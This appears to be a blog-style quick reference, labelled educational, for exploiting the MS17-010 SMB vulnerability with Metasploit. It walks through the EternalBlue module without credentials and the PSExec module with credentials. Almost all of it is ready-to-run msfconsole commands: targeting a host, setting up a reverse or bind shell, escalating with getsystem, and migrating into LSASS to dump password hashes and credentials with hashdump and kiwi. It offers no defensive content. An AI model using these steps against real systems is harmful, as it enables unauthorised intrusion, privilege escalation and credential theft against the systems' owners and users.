Remote Exploit MS17-010

27 Mar 2021, 11 p.m.
03:14 minutes

This article serves as a quick reference to exploiting the MS17-010 with the Metasploit Framework. This article is for educational purposes only.


    Two methods are demonstrated; with and without compromised credentials. This article does not discuss the vulnerability and its background.

    Method 1 - MS17-010 exploitation without credentials: EternalBlue

    Step 1 - Launch Metasploit and choose the `ms17_010_eternalblue` exploit
    msfconsole
    [...]
    use exploit/windows/smb/ms17_010_eternalblue
    
    Step 2 - Configure options for your target

    Configure the exploit with the options that are specific to your target. Setting the remote port is optional; it is 445 by default.

    show targets
    set TARGET <id>
    set RHOST <target IP>
    set RPORT <target port> (445 by default)
    
    Step 3 - Configure options for your machine

    Configure the listener options for your machine with:

    set LHOST <your IP>
    set LPORT <port of your choice>
    
    Step 4 - Optional: Configure a payload

    This step is optional. By default, windows/x64/meterpreter/reverse_tcp is used.

    show payloads
    

    Choose and set a payload with:

    set PAYLOAD <payload>
    
    Step 5 - Exploit

    To run the exploit use:

    exploit
    

    A reverse connection is initiated upon successful exploitation.

    For post-exploitation tips, see step 6 of Method 2 below.

    Method 2 - MS17-010 exploitation with credentials: PSExec

    This method requires valid credentials. The example below uses a domain-joined target.

    Step 1 - Launch Metasploit and choose the `ms17_010_psexec` exploit
    msfconsole
    [...]
    use exploit/windows/smb/ms17_010_psexec
    
    Step 2 - Configure options for your target

    Configure the exploit with the options that are specific to your target. Setting the remote port is optional; it is 445 by default.

    show targets
    set TARGET <id>
    set RHOST <target IP>
    set RPORT <target port> (445 by default)
    set SMBUSER <user>
    set SMBPASS <password>
    set SMBDOMAIN <domain>
    
    Step 3 - Configure options for your machine

    Configure the listener options for your machine with:

    set LHOST <your IP>
    set LPORT <port of your choice>
    
    Step 4 - Optional: Configure a payload

    This step is optional. By default, windows/x64/meterpreter/reverse_tcp is used.

    show payloads
    

    Choose and set a payload with:

    set PAYLOAD <payload>
    

    For example, to use a smaller, stageless bind payload, you can choose:

    set PAYLOAD generic/shell_bind_tcp
    
    Step 5 - Exploit

    To run the exploit use:

    exploit
    
    Step 6 - Optional: Post-Exploitation

    If you used a non-Meterpreter payload, you can upgrade the session to Meterpreter using:

    CTRL + Z (backgrounds the current session)
    use post/multi/manage/shell_to_meterpreter
    sessions -l
    set session <session id>
    set LHOST <your IP>
    set LPORT <port of your choice>
    exploit
    

    Note: You may need to run this module a few times before the shell is upgraded.

    Once you have upgraded your shell, interact with the new Meterpreter session and escalate your privileges:

    sessions -i <meterpreter session id>
    getsystem
    

    To migrate into the LSASS process and dump credentials, use:

    ps
    migrate -N lsass.exe
    hashdump
    load kiwi
    creds_all
    
